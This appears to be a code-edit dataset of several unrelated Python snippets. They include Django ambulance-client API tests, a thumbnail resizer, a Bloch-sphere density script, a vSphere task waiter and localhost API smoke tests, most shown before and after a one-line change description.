self.assertEqual(log.status, ClientStatus.F.name)
self.assertEqual(log.activity, ClientActivity.HO.name)
self.assertEqual(log.details, self.h2.name)
self.assertEqual(len(ClientLog.objects.filter(client=client1)), 15)
def testPermissions(self):
with self.assertRaises(PermissionDenied):
with transaction.atomic():
Client.objects.create(client_id='client_id_1', user=self.u2,
status=ClientStatus.O.name, ambulance=self.a1)
with self.assertRaises(PermissionDenied):
with transaction.atomic():
Client.objects.create(client_id='client_id_1', user=self.u2,
status=ClientStatus.O.name, ambulance=self.a1, hospital=self.h1)
with self.assertRaises(PermissionDenied):
with transaction.atomic():
Client.objects.create(client_id='client_id_1', user=self.u3,
status=ClientStatus.O.name, hospital=self.h1)
with self.assertRaises(PermissionDenied):
with transaction.atomic():
Client.objects.create(client_id='client_id_1', user=self.u3,
status=ClientStatus.O.name, ambulance=self.a1, hospital=self.h1)
def testClientSerializer(self):
# test ClientSerializer
# client online
client1 = Client.objects.create(client_id='client_id_1', user=self.u1,
status=ClientStatus.O.name, ambulance=self.a1)
serializer = ClientSerializer(client1)
result = {
'id': client1.id,
'client_id': client1.client_id,
'user': client1.user.id,
'status': client1.status,
'ambulance': client1.ambulance.id,
'hospital': None,
'updated_on': date2iso(client1.updated_on)
}
self.assertDictEqual(serializer.data, result)
# create client
serializer = ClientSerializer(data={
'client_id': 'client_id_3',
'status': ClientStatus.O.name,
'ambulance': None,
'hospital': None
})
if not serializer.is_valid():
logger.debug('errors = {}'.format(serializer.errors))
self.assertTrue(False)
serializer.save(user=self.u2)
client2 = Client.objects.get(client_id='client_id_3')
self.assertEqual(client2.status, ClientStatus.O.name)
self.assertEqual(client2.user, self.u2)
self.assertEqual(client2.ambulance, None)
self.assertEqual(client2.hospital, None)
# create client
serializer = ClientSerializer(data={
'client_id': 'client_id_4',
'status': ClientStatus.O.name,
'ambulance': self.a2.id,
'hospital': None
})
if not serializer.is_valid():
logger.debug('errors = {}'.format(serializer.errors))
self.assertTrue(False)
serializer.save(user=self.u1)
client2 = Client.objects.get(client_id='client_id_4')
self.assertEqual(client2.status, ClientStatus.O.name)
self.assertEqual(client2.user, self.u1)
self.assertEqual(client2.ambulance, self.a2)
self.assertEqual(client2.hospital, None)
# update client
serializer = ClientSerializer(data={
'client_id': 'client_id_4',
'hospital': self.h1.id
}, partial=True)
if not serializer.is_valid():
logger.debug('errors = {}'.format(serializer.errors))
self.assertTrue(False)
serializer.save(user=self.u1)
client2 = Client.objects.get(client_id='client_id_4')
self.assertEqual(client2.status, ClientStatus.O.name)
self.assertEqual(client2.user, self.u1)
self.assertEqual(client2.ambulance, self.a2)
self.assertEqual(client2.hospital, self.h1)
def test_client_viewset(self):
# client online
client1 = Client.objects.create(client_id='client_id_1', user=self.u1,
status=ClientStatus.O.name)
# instantiate client
client = DjangoClient()
# login as admin
client.login(username=settings.MQTT['USERNAME'], password=settings.MQTT['PASSWORD'])
# retrieve
response = client.get('/en/api/client/{}/'.format(str(client1.client_id)),
follow=True)
self.assertEqual(response.status_code, 200)
result = JSONParser().parse(BytesIO(response.content))
answer = ClientSerializer(client1).data
self.assertDictEqual(result, answer)
# set status and ambulance
status = ClientStatus.O.name
response = client.patch('/en/api/client/{}/'.format(str(client1.client_id)),
content_type='application/json',
data=json.dumps({
'status': status,
'ambulance': self.a1.id
}),
follow=True)
self.assertEqual(response.status_code, 200)
result = JSONParser().parse(BytesIO(response.content))
answer = ClientSerializer(Client.objects.get(id=client1.id)).data
self.assertDictEqual(result, answer)
# retrieve new status
response = client.get('/en/api/client/{}/'.format(str(client1.client_id)),
follow=True)
self.assertEqual(response.status_code, 200)
result = JSONParser().parse(BytesIO(response.content))
self.assertEqual(result['status'], status)
self.assertEqual(result['ambulance'], self.a1.id)
# # set status location
# timestamp = timezone.now()
# location = {'latitude': -2., 'longitude': 7.}
#
# response = client.patch('/en/api/ambulance/{}/'.format(str(self.a1.id)),
# content_type='application/json',
# data=json.dumps({
# 'location': point2str(location),
# 'timestamp': date2iso(timestamp),
# }),
# follow=True)
# self.assertEqual(response.status_code, 200)
# result = JSONParser().parse(BytesIO(response.content))
# answer = AmbulanceSerializer(Ambulance.objects.get(id=self.a1.id)).data
# if math.fabs(answer['orientation'] - result['orientation']) < 1e-4:
# answer['orientation'] = result['orientation']
# self.assertDictEqual(result, answer)
#
# # retrieve new ambulance location
# response = client.get('/en/api/ambulance/{}/'.format(str(self.a1.id)))
# self.assertEqual(response.status_code, 200)
# result = JSONParser().parse(BytesIO(response.content))
# self.assertEqual(result['status'], status)
# self.assertEqual(result['location'], point2str(location))
# self.assertEqual(result['timestamp'], date2iso(timestamp))
#
# # set wrong attribute
# response = client.patch('/en/api/ambulance/{}/'.format(str(self.a1.id)),
# content_type='application/json',
# data=json.dumps({
# 'status': 'will fail'
# }),
# follow=True)
# self.assertEqual(response.status_code, 400)
#
# # set wrong ambulance id
# response = client.patch('/en/api/ambulance/100/',
# data=json.dumps({
# 'status': status
# }),
# follow=True)
# self.assertEqual(response.status_code, 404)
#
# # logout
# client.logout()
#
# # login as testuser2
# client.login(username='testuser2', password='very_secret')
#
# # retrieve ambulance
# response = client.get('/en/api/ambulance/{}/'.format(str(self.a3.id)),
# follow=True)
# self.assertEqual(response.status_code, 200)
# result = JSONParser().parse(BytesIO(response.content))
# answer = AmbulanceSerializer(self.a3).data
# self.assertDictEqual(result, answer)
#
# # set status ambulance
# status = AmbulanceStatus.OS.name
# response = client.patch('/en/api/ambulance/{}/'.format(str(self.a3.id)),
# content_type='application/json',
# data=json.dumps({
# 'status': status,
# }),
# follow=True)
# self.assertEqual(response.status_code, 200)
# result = JSONParser().parse(BytesIO(response.content))
# answer = AmbulanceSerializer(Ambulance.objects.get(id=self.a3.id)).data
# self.assertDictEqual(result, answer)
#
# # retrieve new ambulance status
# response = client.get('/en/api/ambulance/{}/'.format(str(self.a3.id)),
# follow=True)
# self.assertEqual(response.status_code, 200)
# result = JSONParser().parse(BytesIO(response.content))
# self.assertEqual(result['status'], status)
#
# # set location
# timestamp = timezone.now()
# location = {'latitude': -2., 'longitude': 7.}
#
# response = client.patch('/en/api/ambulance/{}/'.format(str(self.a3.id)),
# content_type='application/json',
# data=json.dumps({
# 'location': point2str(location),
# 'timestamp': date2iso(timestamp),
# }),
# follow=True)
# self.assertEqual(response.status_code, 200)
# result = JSONParser().parse(BytesIO(response.content))
# answer = AmbulanceSerializer(Ambulance.objects.get(id=self.a3.id)).data
# if math.fabs(answer['orientation'] - result['orientation']) < 1e-4:
# answer['orientation'] = result['orientation']
# self.assertDictEqual(result, answer)
#
# # retrieve new ambulance location
# response = client.get('/en/api/ambulance/{}/'.format(str(self.a3.id)),
# follow=True)
# self.assertEqual(response.status_code, 200)
# result = JSONParser().parse(BytesIO(response.content))
# self.assertEqual(result['status'], status)
# self.assertEqual(result['location'], point2str(location))
# self.assertEqual(result['timestamp'], date2iso(timestamp))
#
# # set status ambulance
# status = AmbulanceStatus.OS.name
# response = client.patch('/en/api/ambulance/{}/'.format(str(self.a1.id)),
# content_type='application/json',
# data=json.dumps({
# 'status': status,
# }),
# follow=True)
# self.assertEqual(response.status_code, 404)
#
# # set status ambulance
# status = AmbulanceStatus.OS.name
# response = client.patch('/en/api/ambulance/{}/'.format(str(self.a2.id)),
# content_type='application/json',
# data=json.dumps({
# 'status': status,
# }),
# follow=True)
# self.assertEqual(response.status_code, 404)
#
# # logout
# client.logout()
#
# # login as testuser1
# client.login(username='testuser1', password='top_secret')
#
# # set status ambulance
# status = AmbulanceStatus.OS.name
# response = client.patch('/en/api/ambulance/{}/'.format(str(self.a1.id)),
# content_type='application/json',
# data=json.dumps({
# 'status': status,
# }),
# follow=True)
# self.assertEqual(response.status_code, 404)
#
# # set status ambulance
# status = AmbulanceStatus.OS.name
# response = client.patch('/en/api/ambulance/{}/'.format(str(self.a2.id)),
# content_type='application/json',
# data=json.dumps({
# 'status': status,
# }),
# follow=True)
# self.assertEqual(response.status_code, 404)
#
# # set status ambulance
# status = AmbulanceStatus.OS.name
# response = client.patch('/en/api/ambulance/{}/'.format(str(self.a3.id)),
# content_type='application/json',
# data=json.dumps({
# 'status': status,
# }),
# follow=True)
# self.assertEqual(response.status_code, 404)
#
# # logout
# client.logout()
|
from cStringIO import StringIO
from PIL import Image
from django.conf import settings
from django.core.files.storage import get_storage_class
import os
import requests
from utils.viewer_tools import get_path
def flat(*nums):
    '''Coerce each numeric argument to an int and return them as a tuple.

    Useful because PIL crop and resize require integer points.
    source: https://gist.github.com/16a01455
    '''
    rounded = []
    for value in nums:
        rounded.append(int(round(value)))
    return tuple(rounded)
def get_dimensions(dimensions, longest_side):
    '''Scale a (width, height) pair so its longest side equals
    ``longest_side`` while preserving the aspect ratio.

    Bug fix: the original reassigned the longest side *before* using it
    as the divisor, so the short side came out unscaled (and Python 2
    integer division could collapse it to 0, causing the downstream
    ZeroDivisionError). The ratio is now computed against the original
    value, with true division.
    '''
    width, height = dimensions
    if width > height:
        # scale by the ORIGINAL width, then clamp width
        height = height * longest_side / float(width)
        width = longest_side
    elif height > width:
        width = width * longest_side / float(height)
        height = longest_side
    else:
        width = height = longest_side
    # PIL crop/resize require integer points
    return tuple(int(round(side)) for side in (width, height))
def _save_thumbnails(image, path, size, suffix, filename=None):
    '''Resize ``image`` in place and persist the thumbnail.

    When ``filename`` is given, the thumbnail is rendered to the local
    filesystem path first and then copied into the default (e.g. S3)
    storage under ``filename``.
    '''
    local_target = get_path(path, suffix)
    if filename:
        remote_storage = get_storage_class()()
        local_storage = get_storage_class(
            'django.core.files.storage.FileSystemStorage')()
        # float() forces true division inside get_dimensions
        image.thumbnail(get_dimensions(image.size, float(size)),
                        Image.ANTIALIAS)
        image.save(local_target)
        remote_storage.save(get_path(filename, suffix),
                            local_storage.open(local_target))
    else:
        image.thumbnail(get_dimensions(image.size, size), Image.ANTIALIAS)
        image.save(local_target)
def resize(filename):
    '''Download ``filename`` from the default storage by URL and generate
    every configured thumbnail size for it.

    Silently does nothing when the download fails (non-200 response).
    Improvement: the list comprehension used purely for side effects is
    replaced by a plain loop.
    '''
    default_storage = get_storage_class()()
    req = requests.get(default_storage.url(filename))
    if req.status_code != 200:
        return
    image = Image.open(StringIO(req.content))
    conf = settings.THUMB_CONF
    fs = get_storage_class('django.core.files.storage.FileSystemStorage')()
    media_root = os.path.abspath(settings.MEDIA_ROOT)
    if not os.path.exists(media_root):
        os.makedirs(media_root)
    # scratch file used as the local render target before each upload
    loc_path = fs.path('dummy.%s' % settings.IMG_FILE_TYPE)
    for key in settings.THUMB_ORDER:
        _save_thumbnails(image, loc_path, conf[key]['size'],
                         conf[key]['suffix'], filename=filename)
def resize_local_env(filename):
    '''Generate every configured thumbnail size for a file stored on the
    local filesystem storage.

    Improvement: the list comprehension used purely for side effects is
    replaced by a plain loop.
    '''
    default_storage = get_storage_class()()
    path = default_storage.path(filename)
    image = Image.open(path)
    conf = settings.THUMB_CONF
    for key in settings.THUMB_ORDER:
        _save_thumbnails(image, path, conf[key]['size'], conf[key]['suffix'])
def image_url(attachment, suffix):
    '''Return url of an image given size(@param suffix)
    e.g large, medium, small, or generate required thumbnail.

    Returns the original url for suffix == 'original', None for an
    unknown suffix, and the full-size url when the source file no longer
    exists in storage.

    Improvement: replaces the Python-2-only dict.has_key with ``in``.
    '''
    url = attachment.media_file.url
    if suffix == 'original':
        return url
    if suffix not in settings.THUMB_CONF:
        return None
    default_storage = get_storage_class()()
    fs = get_storage_class('django.core.files.storage.FileSystemStorage')()
    size = settings.THUMB_CONF[suffix]['suffix']
    filename = attachment.media_file.name
    if not default_storage.exists(filename):
        # source is gone; fall back to the full-size url
        return url
    thumb = get_path(filename, size)
    if default_storage.exists(thumb) and default_storage.size(thumb) > 0:
        return default_storage.url(thumb)
    # thumbnail missing or empty: build it, then retry
    # NOTE(review): if resize() silently fails this recursion does not
    # terminate — same as the original behavior; confirm upstream.
    if default_storage.__class__ != fs.__class__:
        resize(filename)
    else:
        resize_local_env(filename)
    return image_url(attachment, suffix)
Handle ZeroDivisionError exceptions, which occur when the image height and the thumbnail height are the same.
from cStringIO import StringIO
from PIL import Image
from django.conf import settings
from django.core.files.storage import get_storage_class
import os
import requests
from utils.viewer_tools import get_path
def flat(*nums):
    '''Coerce each numeric argument to an int and return them as a tuple.

    Useful because PIL crop and resize require integer points.
    source: https://gist.github.com/16a01455
    '''
    rounded = []
    for value in nums:
        rounded.append(int(round(value)))
    return tuple(rounded)
def get_dimensions(dimensions, longest_side):
    '''Scale a (width, height) pair so its longest side equals
    ``longest_side`` while preserving the aspect ratio.

    Bug fix: the original reassigned the longest side *before* using it
    as the divisor, so the short side came out unscaled (and Python 2
    integer division could collapse it to 0 — the reason the caller had
    to swallow ZeroDivisionError). The ratio is now computed against the
    original value, with true division.
    '''
    width, height = dimensions
    if width > height:
        # scale by the ORIGINAL width, then clamp width
        height = height * longest_side / float(width)
        width = longest_side
    elif height > width:
        width = width * longest_side / float(height)
        height = longest_side
    else:
        width = height = longest_side
    # PIL crop/resize require integer points
    return tuple(int(round(side)) for side in (width, height))
def _save_thumbnails(image, path, size, suffix, filename=None):
    '''Resize ``image`` in place and persist the thumbnail.

    When ``filename`` is given, the thumbnail is rendered to the local
    filesystem path first and then copied into the default (e.g. S3)
    storage under ``filename``.
    '''
    local_target = get_path(path, suffix)
    if filename:
        remote_storage = get_storage_class()()
        local_storage = get_storage_class(
            'django.core.files.storage.FileSystemStorage')()
        # float() forces true division inside get_dimensions
        image.thumbnail(get_dimensions(image.size, float(size)),
                        Image.ANTIALIAS)
        image.save(local_target)
        remote_storage.save(get_path(filename, suffix),
                            local_storage.open(local_target))
    else:
        try:
            image.thumbnail(get_dimensions(image.size, size),
                            Image.ANTIALIAS)
        except ZeroDivisionError:
            # happens when the height and thumbnail height coincide;
            # keep the original pixels in that case
            pass
        image.save(local_target)
def resize(filename):
    '''Download ``filename`` from the default storage by URL and generate
    every configured thumbnail size for it.

    Silently does nothing when the download fails (non-200 response).
    Improvement: the list comprehension used purely for side effects is
    replaced by a plain loop.
    '''
    default_storage = get_storage_class()()
    req = requests.get(default_storage.url(filename))
    if req.status_code != 200:
        return
    image = Image.open(StringIO(req.content))
    conf = settings.THUMB_CONF
    fs = get_storage_class('django.core.files.storage.FileSystemStorage')()
    media_root = os.path.abspath(settings.MEDIA_ROOT)
    if not os.path.exists(media_root):
        os.makedirs(media_root)
    # scratch file used as the local render target before each upload
    loc_path = fs.path('dummy.%s' % settings.IMG_FILE_TYPE)
    for key in settings.THUMB_ORDER:
        _save_thumbnails(image, loc_path, conf[key]['size'],
                         conf[key]['suffix'], filename=filename)
def resize_local_env(filename):
    '''Generate every configured thumbnail size for a file stored on the
    local filesystem storage.

    Improvement: the list comprehension used purely for side effects is
    replaced by a plain loop.
    '''
    default_storage = get_storage_class()()
    path = default_storage.path(filename)
    image = Image.open(path)
    conf = settings.THUMB_CONF
    for key in settings.THUMB_ORDER:
        _save_thumbnails(image, path, conf[key]['size'], conf[key]['suffix'])
def image_url(attachment, suffix):
    '''Return url of an image given size(@param suffix)
    e.g large, medium, small, or generate required thumbnail.

    Returns the original url for suffix == 'original', None for an
    unknown suffix, and the full-size url when the source file no longer
    exists in storage.

    Improvement: replaces the Python-2-only dict.has_key with ``in``.
    '''
    url = attachment.media_file.url
    if suffix == 'original':
        return url
    if suffix not in settings.THUMB_CONF:
        return None
    default_storage = get_storage_class()()
    fs = get_storage_class('django.core.files.storage.FileSystemStorage')()
    size = settings.THUMB_CONF[suffix]['suffix']
    filename = attachment.media_file.name
    if not default_storage.exists(filename):
        # source is gone; fall back to the full-size url
        return url
    thumb = get_path(filename, size)
    if default_storage.exists(thumb) and default_storage.size(thumb) > 0:
        return default_storage.url(thumb)
    # thumbnail missing or empty: build it, then retry
    # NOTE(review): if resize() silently fails this recursion does not
    # terminate — same as the original behavior; confirm upstream.
    if default_storage.__class__ != fs.__class__:
        resize(filename)
    else:
        resize_local_env(filename)
    return image_url(attachment, suffix)
|
#!/usr/bin/python3
from scipy.optimize import root
import numpy as np
from numpy import cosh, arccosh, sinh, arctan2, cos, sin, exp, pi
import matplotlib.pyplot as plt
from matplotlib import cm, colors
from mpl_toolkits.mplot3d import Axes3D
atan2 = arctan2
def map_qpm_to_sphere(qs, epsilon):
    """Map (qp, qm) values to the surface of the Bloch sphere.

    Returns np.array([cos(theta), phi]).
    """
    arg_p = 2 * epsilon * qs[0]
    arg_m = 2 * epsilon * qs[1]
    cos_theta = 2 / (cosh(arg_p) + cosh(arg_m))
    phi = atan2(sinh(epsilon * (qs[0] - qs[1])),
                (sinh(arg_p) + sinh(arg_m)) / 2)
    return np.array([cos_theta, phi])
def map_q12_to_sphere(qs, epsilon):
    """Map (q1, q2) values to the surface of the Bloch sphere.

    Returns np.array([cos(theta), phi]).
    """
    arg_sum = epsilon * (qs[0] + qs[1])
    arg_diff = epsilon * (qs[0] - qs[1])
    cos_theta = 2 / (cosh(arg_sum) + cosh(arg_diff))
    phi = atan2(sinh(epsilon * qs[1]),
                (sinh(arg_sum) + sinh(arg_diff)) / 2)
    return np.array([cos_theta, phi])
# angles = np.array([cos(Theta), Phi])
def guess_qpm_vals(angles, epsilon):
    """Generate an initial (qp, qm) guess for the rootfinder.

    angles = np.array([cos(Theta), Phi]); the pole cos(theta) == 1 maps
    to the origin of the plane.
    """
    radius = arccosh(2/angles[0] - 1)/(2*epsilon)
    rotated = pi/4 - angles[1]
    guess = np.array([cos(rotated)*radius, sin(rotated)*radius])
    return np.where(angles[0] == 1, np.zeros(angles.shape), guess)
# angles = np.array([cos(Theta), Phi])
def array_get_qpm_vals(angles, epsilon):
    """Takes points on the upper hemisphere of the bloch sphere and maps them to
    points on the qp qm plane.

    ``angles`` appears to be shaped (2, M, N): angles[0] a grid of
    cos(theta) values, angles[1] a grid of phi values — TODO confirm
    against callers. Returns an array of the same shape holding the
    (qp, qm) solutions (zeros where the rootfinder failed).
    """
    costheta = np.array(angles[0])
    phi = np.array(angles[1])
    # Put phi in the range [-pi/2, 3pi/2).
    phi = (phi + pi/2) % (2*pi) - pi/2
    # If phi in range [pi/2, 3pi/2), solve for qs using phi - pi and negate the
    # q values obtained (exploits the antisymmetry of the forward map).
    sign = np.where(phi > pi/2, -1, 1)
    phi = np.where(phi > pi/2, phi - pi, phi)
    # Currently solving for values individually, but when passed an array
    # of angle values it won't converge (I think the rootfinder thinks it has
    # to solve for all the roots simultaneously as a large system of
    # equations).
    inverted = np.zeros(np.array(angles).shape)
    for m in range(angles.shape[1]):
        for n in range(angles.shape[2]):
            if costheta[m, n] == 1:
                # The pole cos(theta) == 1 maps to the origin of the plane.
                inverted[:, m, n] = np.array([0, 0])
            else:
                try:
                    # Numerically invert the forward map, seeded by the
                    # closed-form guess.
                    sol = root(lambda qs: map_qpm_to_sphere(qs, epsilon) -
                               np.array([costheta[m, n], phi[m, n]]),
                               guess_qpm_vals(np.array([costheta[m, n],
                                                        phi[m, n]]), epsilon))
                    inverted[:, m, n] = sign[m, n]*sol.x
                except Exception as e:
                    # Best-effort: report the failing grid point and leave
                    # zeros in the output.
                    print('cos(theta) = ' + str(costheta[m, n]) +
                          ', phi = ' + str(phi[m, n]) + ', sign = ' +
                          str(sign[m, n]) + '\n' + str(e))
    return inverted
def G_qpm(qp, qm, epsilon):
    """The probability density function on the qp qm plane. (might be improperly
    normalized)
    """
    gaussian = exp(-epsilon*(qp**2 + qm**2 + 1))
    hyperbolic = cosh(2*epsilon*qp) + cosh(2*epsilon*qm)
    return epsilon/(4*pi) * gaussian * hyperbolic
def G_q12(q1, q2, epsilon):
    """The probability density function on the q1 q2 plane. (might be improperly
    normalized)
    """
    gaussian = exp(-epsilon*(q1**2 + q2**2 + 2)/2)
    hyperbolic = cosh(epsilon*(q1 + q2)) + cosh(epsilon*(q1 - q2))
    return epsilon/(4*pi) * gaussian * hyperbolic
def G_angles(angles, epsilon):
    """The probability density function on the upper hemisphere of the bloch
    sphere.

    Transforms the planar density G_qpm through the inverse coordinate
    map, dividing by the local area element of the (qp, qm) -> sphere
    mapping.
    """
    qp, qm = array_get_qpm_vals(angles, epsilon)
    # Hyperbolic building blocks of the area element.
    s_pp = sinh(2*epsilon*qp)
    s_pm = sinh(epsilon*(qp + qm))
    s_mp = sinh(epsilon*(qp - qm))
    s_mm = sinh(2*epsilon*qm)
    c_pp = cosh(2*epsilon*qp)
    c_mp = cosh(epsilon*(qp - qm))
    c_mm = cosh(2*epsilon*qm)
    # NOTE(review): presumably the area of the image parallelogram of the
    # coordinate map, derived offline — confirm against the derivation.
    parallelogram_area = (np.abs((s_pp + s_mm)**2*c_mp +
                                 2*(s_pp - s_mm)*s_mp*c_pp) /
                          ((c_pp + c_mm)**2*(4*s_pm**2 + s_mp**2 +
                                             s_pp**2 + s_mm**2)))
    return G_qpm(qp, qm, epsilon)/parallelogram_area
Added "from __future__ import division" so the script also runs correctly under Python 2.
#!/usr/bin/python3
from __future__ import division
from scipy.optimize import root
import numpy as np
from numpy import cosh, arccosh, sinh, arctan2, cos, sin, exp, pi
import matplotlib.pyplot as plt
from matplotlib import cm, colors
from mpl_toolkits.mplot3d import Axes3D
atan2 = arctan2
def map_qpm_to_sphere(qs, epsilon):
    """Map (qp, qm) values to the surface of the Bloch sphere.

    Returns np.array([cos(theta), phi]).
    """
    arg_p = 2 * epsilon * qs[0]
    arg_m = 2 * epsilon * qs[1]
    cos_theta = 2 / (cosh(arg_p) + cosh(arg_m))
    phi = atan2(sinh(epsilon * (qs[0] - qs[1])),
                (sinh(arg_p) + sinh(arg_m)) / 2)
    return np.array([cos_theta, phi])
def map_q12_to_sphere(qs, epsilon):
    """Map (q1, q2) values to the surface of the Bloch sphere.

    Returns np.array([cos(theta), phi]).
    """
    arg_sum = epsilon * (qs[0] + qs[1])
    arg_diff = epsilon * (qs[0] - qs[1])
    cos_theta = 2 / (cosh(arg_sum) + cosh(arg_diff))
    phi = atan2(sinh(epsilon * qs[1]),
                (sinh(arg_sum) + sinh(arg_diff)) / 2)
    return np.array([cos_theta, phi])
# angles = np.array([cos(Theta), Phi])
def guess_qpm_vals(angles, epsilon):
    """Generate an initial (qp, qm) guess for the rootfinder.

    angles = np.array([cos(Theta), Phi]); the pole cos(theta) == 1 maps
    to the origin of the plane.
    """
    radius = arccosh(2/angles[0] - 1)/(2*epsilon)
    rotated = pi/4 - angles[1]
    guess = np.array([cos(rotated)*radius, sin(rotated)*radius])
    return np.where(angles[0] == 1, np.zeros(angles.shape), guess)
# angles = np.array([cos(Theta), Phi])
def array_get_qpm_vals(angles, epsilon):
    """Takes points on the upper hemisphere of the bloch sphere and maps them to
    points on the qp qm plane.

    ``angles`` appears to be shaped (2, M, N): angles[0] a grid of
    cos(theta) values, angles[1] a grid of phi values — TODO confirm
    against callers. Returns an array of the same shape holding the
    (qp, qm) solutions (zeros where the rootfinder failed).
    """
    costheta = np.array(angles[0])
    phi = np.array(angles[1])
    # Put phi in the range [-pi/2, 3pi/2).
    phi = (phi + pi/2) % (2*pi) - pi/2
    # If phi in range [pi/2, 3pi/2), solve for qs using phi - pi and negate the
    # q values obtained (exploits the antisymmetry of the forward map).
    sign = np.where(phi > pi/2, -1, 1)
    phi = np.where(phi > pi/2, phi - pi, phi)
    # Currently solving for values individually, but when passed an array
    # of angle values it won't converge (I think the rootfinder thinks it has
    # to solve for all the roots simultaneously as a large system of
    # equations).
    inverted = np.zeros(np.array(angles).shape)
    for m in range(angles.shape[1]):
        for n in range(angles.shape[2]):
            if costheta[m, n] == 1:
                # The pole cos(theta) == 1 maps to the origin of the plane.
                inverted[:, m, n] = np.array([0, 0])
            else:
                try:
                    # Numerically invert the forward map, seeded by the
                    # closed-form guess.
                    sol = root(lambda qs: map_qpm_to_sphere(qs, epsilon) -
                               np.array([costheta[m, n], phi[m, n]]),
                               guess_qpm_vals(np.array([costheta[m, n],
                                                        phi[m, n]]), epsilon))
                    inverted[:, m, n] = sign[m, n]*sol.x
                except Exception as e:
                    # Best-effort: report the failing grid point and leave
                    # zeros in the output.
                    print('cos(theta) = ' + str(costheta[m, n]) +
                          ', phi = ' + str(phi[m, n]) + ', sign = ' +
                          str(sign[m, n]) + '\n' + str(e))
    return inverted
def G_qpm(qp, qm, epsilon):
    """The probability density function on the qp qm plane. (might be improperly
    normalized)
    """
    gaussian = exp(-epsilon*(qp**2 + qm**2 + 1))
    hyperbolic = cosh(2*epsilon*qp) + cosh(2*epsilon*qm)
    return epsilon/(4*pi) * gaussian * hyperbolic
def G_q12(q1, q2, epsilon):
    """The probability density function on the q1 q2 plane. (might be improperly
    normalized)
    """
    gaussian = exp(-epsilon*(q1**2 + q2**2 + 2)/2)
    hyperbolic = cosh(epsilon*(q1 + q2)) + cosh(epsilon*(q1 - q2))
    return epsilon/(4*pi) * gaussian * hyperbolic
def G_angles(angles, epsilon):
    """The probability density function on the upper hemisphere of the bloch
    sphere.

    Transforms the planar density G_qpm through the inverse coordinate
    map, dividing by the local area element of the (qp, qm) -> sphere
    mapping.
    """
    qp, qm = array_get_qpm_vals(angles, epsilon)
    # Hyperbolic building blocks of the area element.
    s_pp = sinh(2*epsilon*qp)
    s_pm = sinh(epsilon*(qp + qm))
    s_mp = sinh(epsilon*(qp - qm))
    s_mm = sinh(2*epsilon*qm)
    c_pp = cosh(2*epsilon*qp)
    c_mp = cosh(epsilon*(qp - qm))
    c_mm = cosh(2*epsilon*qm)
    # NOTE(review): presumably the area of the image parallelogram of the
    # coordinate map, derived offline — confirm against the derivation.
    parallelogram_area = (np.abs((s_pp + s_mm)**2*c_mp +
                                 2*(s_pp - s_mm)*s_mp*c_pp) /
                          ((c_pp + c_mm)**2*(4*s_pm**2 + s_mp**2 +
                                             s_pp**2 + s_mm**2)))
    return G_qpm(qp, qm, epsilon)/parallelogram_area
|
import time
from pyVmomi import vim
class SynchronousTaskWaiter(object):
    """Blocks until a vSphere task finishes and reports its outcome."""

    def __init__(self):
        pass

    # noinspection PyMethodMayBeStatic
    def wait_for_task(self, task, logger, action_name='job', hide_result=False):
        """
        Waits and provides updates on a vSphere task

        :param task: pyVmomi task object to block on
        :param logger: destination for progress/error messages
        :param action_name: human-readable label for log lines
        :param hide_result: when True, do not log the task result
        :return: the task's result object
        :raises Exception: if the task finished in an error state
        """
        # Poll every 2s while the task is still pending or executing.
        busy_states = (vim.TaskInfo.State.running, vim.TaskInfo.State.queued)
        while task.info.state in busy_states:
            time.sleep(2)

        if task.info.state == vim.TaskInfo.State.success:
            if task.info.result is not None and not hide_result:
                logger.info('%s completed successfully, result: %s'
                            % (action_name, task.info.result))
            else:
                logger.info('%s completed successfully.' % action_name)
        else:  # error state
            multi_msg = ''
            if task.info.error.faultMessage:
                multi_msg = ', '.join(err.message
                                      for err in task.info.error.faultMessage)
            logger.info(multi_msg)
            raise Exception(multi_msg)
        return task.info.result
Refactored task_waiter to be more Pythonic.
import time
from pyVmomi import vim
class SynchronousTaskWaiter(object):
    """Synchronously waits on vSphere tasks and logs their outcome."""

    def __init__(self):
        pass

    # noinspection PyMethodMayBeStatic
    def wait_for_task(self, task, logger, action_name='job', hide_result=False):
        """
        Waits and provides updates on a vSphere task

        :param task: pyVmomi task object to block on
        :param logger: destination for progress/error messages
        :param action_name: human-readable label for log lines
        :param hide_result: when True, do not log the task result
        :return: the task's result object
        :raises Exception: if the task finished in an error state
        """
        # Poll every 2s while the task is still pending or executing.
        while task.info.state in (vim.TaskInfo.State.running,
                                  vim.TaskInfo.State.queued):
            time.sleep(2)

        if task.info.state != vim.TaskInfo.State.success:  # error state
            faults = task.info.error.faultMessage
            multi_msg = ', '.join(err.message for err in faults) if faults else ''
            logger.info(multi_msg)
            raise Exception(multi_msg)

        if task.info.result is not None and not hide_result:
            logger.info('%s completed successfully, result: %s'
                        % (action_name, task.info.result))
        else:
            logger.info('%s completed successfully.' % action_name)
        return task.info.result
|
from rest_framework.test import APIRequestFactory
from rest_framework.test import APIClient
import urllib2
import unittest
# Base url of the locally running API server exercised by the live tests.
BASEURL = "http://127.0.0.1:8000/api"

# DRF request helpers, available for in-process API tests.
factory = APIRequestFactory()
client = APIClient()
class TestYourWebserver(unittest.TestCase):
    """HTTP smoke tests against a locally running API server.

    NOTE(review): these are integration tests -- they require the dev
    server at BASEURL to be up; they will error out otherwise.
    """

    # These were previously referenced as undefined globals, which raised
    # NameError at runtime.  TODO: replace the placeholders with real
    # fixture IDs.
    authorID = "1"
    postID = "1"

    def setUp(self, baseurl=BASEURL):
        self.baseurl = baseurl

    def test_user_post_list(self):
        url = self.baseurl + "/author/posts"
        req = urllib2.urlopen(url, None, 3)
        self.assertTrue(req.getcode() == 200, "200 OK Not FOUND!")
        # NOTE(review): "text/css" looks wrong for a posts endpoint --
        # confirm the expected content type before trusting this assertion.
        self.assertTrue(req.info().gettype() == "text/css",
                        ("Bad mimetype for css! %s" % req.info().gettype()))

    def test_post_list(self):
        url = self.baseurl + "/posts"
        req = urllib2.urlopen(url, None, 3)
        self.assertTrue(req.getcode() == 200, "200 OK Not FOUND!")

    def test_author_post_list(self):
        # was: "/author/" + authorID + "posts" -- missing '/' before "posts"
        url = self.baseurl + "/author/" + self.authorID + "/posts"
        req = urllib2.urlopen(url, None, 3)
        self.assertTrue(req.getcode() == 200, "200 OK Not FOUND!")

    def test_post_detail(self):
        url = self.baseurl + "/post/" + self.postID
        req = urllib2.urlopen(url, None, 3)
        self.assertTrue(req.getcode() == 200, "200 OK Not FOUND!")

    def test_user_list(self):
        # TODO: implement once the user list endpoint exists
        self.skipTest("not implemented")

    def test_user_detail(self):
        # TODO: implement once the user detail endpoint exists
        self.skipTest("not implemented")
# Allow running the test module directly: `python <module>.py`
if __name__ == '__main__':
    unittest.main()
